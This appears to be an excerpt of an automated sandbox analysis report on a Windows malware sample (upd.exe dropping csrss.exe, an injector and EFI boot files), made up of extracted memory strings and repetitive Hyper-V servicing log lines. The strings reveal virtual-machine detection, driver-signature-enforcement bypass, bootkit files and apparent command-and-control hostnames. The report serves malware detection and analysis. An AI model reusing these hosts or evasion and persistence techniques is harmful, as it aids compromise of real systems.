        Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVBOXSERVICEVMUSRVC.EXEVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONBAD ADDRESSBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCOMPAIGN_IDCREATED BY CRYPT32.DLLDNSMESSAGE.E2.KEFF.ORGEMBEDDED/%SFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEHTTPS_PROXYI/O TIMEOUTLOCAL ERRORLOST MCACHEMSPANMANUALMETHODARGS(MSWSOCK.DLLNEXT SERVERNIL CONTEXTORANNIS.COMPARSE ERRORPROCESS: %SRAW-CONTROLREFLECT.SETRETRY-AFTERRUNTIME: P RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITETASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION=183WININET.DLLWUP_PROCESS (SENSITIVE) [RECOVERED] ALLOCCOUNT FOUND AT *( GCSCANDONE M->GSIGNAL= MINTRIGGER= NDATAROOTS= NSPANROOTS= PAGES/BYTE
        Source: upd.exe, csrss.exeBinary or memory string: TOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PAR
        Source: C:\Windows\System32\svchost.exe TID: 6648Thread sleep time: -240000s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe TID: 752Thread sleep time: -59000s >= -30000s
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: B:\EFI\Boot\old.efi (copy)Jump to dropped file
        Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllJump to dropped file
        Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\EFI\Boot\EfiGuardDxe.efiJump to dropped file
        Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\EFI\Boot\bootx64.efiJump to dropped file
        Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\EFI\Microsoft\Boot\bootmgfw.efiJump to dropped file
        Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: B:\EFI\Microsoft\Boot\fw.efi (copy)Jump to dropped file
        Source: C:\Windows\rss\csrss.exeRegistry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
        Source: C:\Users\user\Desktop\upd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Users\user\Desktop\upd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Users\user\Desktop\upd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Windows\windefender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Users\user\Desktop\upd.exeProcess information queried: ProcessInformation
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019D5C10 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 74a95330c532692c7cf7a70ce16db670, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:57:09, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, Applicable: NeedsParent, Disposition: Staged
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: too many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero parameter with GC prog
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:57:09, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 962ff8519dbe320490c8b5e46ae96eb5, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: csrss.exeBinary or memory string: rinvalid locationloopbackmac_addrmountainmountvolmsvmmoufnamelessno anodeno-cacheno_proxyopPseudopolishedraw-readreadfromrecvfromrestlessrunnableruntime.scavengeshutdownsolitarystrconv.taskkilltwilightunixgramunknown(usernamevmmemctlvmx_svgawitheredwsaioctlwua
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Hypervisor, current State: Default, new state: Off, RemovePayload: 0
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: (MISSING)(unknown)+infinity, newval=, oldval=-07:00:00-infinity/api/cdn?/api/poll244140625: status=; Domain=Accuracy(AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]atomicor8b.ooze.ccbad indirbillowingbroadcastbus errorbutterflychallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0ecdsa.netempty urlfn.48.orgfodhelperfork/execfuncargs(gdi32.dllimage/gifimage/pnginterfaceinterruptipv6-icmplingeringlocalhostmSpanDeadmSpanFreemulticastnew tokennil errorntdll.dllole32.dllomitemptypanicwaitpatch.exepclmulqdqprecisionprintableprotocol psapi.dllraw-writereboot inrecover: reflect: resonancerwxrwxrwxscheduledsmb startsnowflakesparklingsucceededtask %+v
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: a39411adbcba7770488faca4732df809, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:42, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V-Hypervisor, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients-63, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Default
        Source: csrss.exeBinary or memory string: nInUseno resultsnot a boolnot signedowner diedprl_cc.exeres binderres masterresumptionrune <nil>runtime: gschedtracesemacquireset-cookiesetsockoptsocks bindterminatedtracefree(tracegc() unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wwildflowerws2_
        Source: csrss.exeBinary or memory string: epslicesmallsmokesnowysockssoundsse41sse42ssse3stilltext/tls13tls: totaluint8usageuser=utf-8valuevmusbvmx86voicewaterwhitewispywriteyoung (MB) Value addr= base code= ctxt: curg= goid jobs= list= m->p= next= p->m= prev= span=%s: %s(...) , not , val -BEFV--DY
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Windows-RemoteFX-Graphics-Virtualization-Host, Applicable: NeedsParent, Disposition: Staged
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> ancientany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scrimsonderivedexpiresfallingfeatherfireflyfloat32float64gctraceglitterhttp://id is 0invalidkdu.exelookup max-agemorningnil keynop -> number panic: patientrefererrefreshrunningserial:server=signal silencesvc_versyscallthundertraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwsarecvwsasendwup_verxen: %wxennet6 data=%q etypes goal
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: d3310f7470f5cc3e99866abe683b453d, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:42, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-All, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Services, new state: Off
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Merge into existing execution package for Package: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, existing TargetedState: Staged, new TargetedState: Staged
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaClass(CommonCookieCopticDELETEExpectFltMgrFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaProgidRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFVT(%d)WINDIRWinMonWinmon[]byte\??\%s\csrss\ufffd
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: de764c40154bbe38bec34936ef639ab9, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 2679350ec0edae52ee03c1daaf55d8c2, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 878b2f9862ce158a90aa7b5c871b772e, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, new state: Off
        Source: csrss.exeBinary or memory string: ikiPRIORITYParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUgariticVBoxWddmVT_ARRAYVT_BYREFWSAIoctlWinmonFS[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnumacceptexa
        Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: to unallocated span%%!%c(*big.Float=%s)%s\Sysnative\cmd.exe37252902984619140625Arabic Standard TimeAzores Standard TimeCertFindChainInStoreCertOpenSystemStoreWChangeServiceConfigWCheckTokenMembershipCreateProcessAsUserWCryptAcquireContextWDHT has wrong lengthDQT has wrong lengthDRI has wrong lengthEgyptian_HieroglyphsEnumProcessModulesExFileTimeToSystemTimeGetAcceptExSockaddrsGetAdaptersAddressesGetCurrentDirectoryWGetFileAttributesExWGetModuleFileNameExWGetModuleInformationGetProcessMemoryInfoGetWindowsDirectoryWIDS_Trinary_OperatorInsufficient StorageIsrael Standard TimeJordan Standard TimeMAX_HEADER_LIST_SIZEMalformed JSON errorMediapartners-GoogleMeroitic_HieroglyphsNtUnmapViewOfSectionNtWriteVirtualMemoryOffline Explorer/2.5ProcessIdToSessionIdQueryServiceConfig2WQueryServiceStatusExRegisterEventSourceWRequest URI Too LongRtlInitUnicodeStringSHGetKnownFolderPathSOF has wrong lengthSOS has wrong lengthSafeArrayDestroyDataSafeArrayGetElemsizeSeek: invalid offsetSeek: invalid whenceSetCurrentDirectoryWSetHandleInformationSetVolumeMountPointWTaipei Standard TimeTerminal_PunctuationTurkey Standard TimeUnprocessable EntityWinmonProcessMonitor[invalid char class]\\.\pipe\VBoxTrayIPCasn1: syntax error: bad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)close of nil channelconnection error: %sconnection timed outcouldn't disable DSEcouldn't get IsAdmincouldn't get serverscouldn't run servicecouldn't set IsAdmincouldn't set serverscouldn't stop PsaSvccouldn't write patchelectrum.hsmiths.comelectrum.taborsky.czelectrum.villocq.comflag: help requestedfloating point errorforcegc: phase errorgc_trigger underflowgetadaptersaddressesgo of nil func valuegopark: bad g statusgzip: invalid headerheader line too longhttp2: stream closedinvalid repeat countinvalid request codeis a named type filejson: Unmarshal(nil json: Unmarshal(nil)key has been revokedmSpanList.insertBackmalformed ciphertextmalloc during signalmultiple SOF markersno such struct fieldnon-empty swept listnorm: invalid whencenot an integer classnotetsleep not on g0number has no digitsnumber of componentsp mcache not flushedpacer: assist ratio=pad length too largepreempt off reason: reflect.Value.SetIntreflect.makeFuncStubrequest file CDN: %wroot\SecurityCenter2runtime: casgstatus runtime: double waitruntime: unknown pc semaRoot rotateRightshort segment lengthsystemdrive is emptytime: invalid numbertrace: out of memoryunexpected network: unknown address typeuser is not an adminverifier host cachedwirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not foundzlib: invalid header gp.gcscanvalid=true
        Source: csrss.exeBinary or memory string: time: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (default %q) (default %v) MB released MB) wo
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-All, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:55, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 350d2f419bdddcb6a98b096b17a5e4ec because it is already in the correct state.
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 6f103d2215911a17c9aeb968bbb7f0f6, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:55, Info CBS Exec: Package: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wwildflowerws2_32.dll of size (targetpc= ErrCode=%v a.npages= b.npages= bytes ...
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 6c8ed4d2fcb42a918382a31f6ce603ca, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: NonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-All, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 8adcd7c28d228e17a421ad9e66bf8586, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:42, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V-Services, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 38d80af2e352703d5d4e13c0bc9c4856, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 38d80af2e352703d5d4e13c0bc9c4856 because it is already in the correct state.
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V_base, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Hypervisor, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:57:09, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-PowerShell, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 1d039a16ef6f80b4a5fd50c2225168a8, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 88e8c6b6d1631bfe1e6f3e0910f44c84, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: b86b0f63de3fd3d9f4c1defbc0a310e2, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V_base, Applicable: NeedsParent, Disposition: Staged
        Source: svchost.exe, 0000001F.00000002.434018305.000002A1980EF000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 71529a01421a29d3f726bde298b145c0, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: a20631c4cf6af783bb59c9a72c1b3c51, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: csrss.exeBinary or memory string: T_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieUser-AgentVMSrvc.exeVT_ILLEGALWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: upd.exe, csrss.exeBinary or memory string: minal_PunctuationTurkey Standard TimeUnprocessable EntityWinmonProcessMonitor[invalid char class]\\.\pipe\VBoxTrayIPCasn1: syntax error: bad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)clo
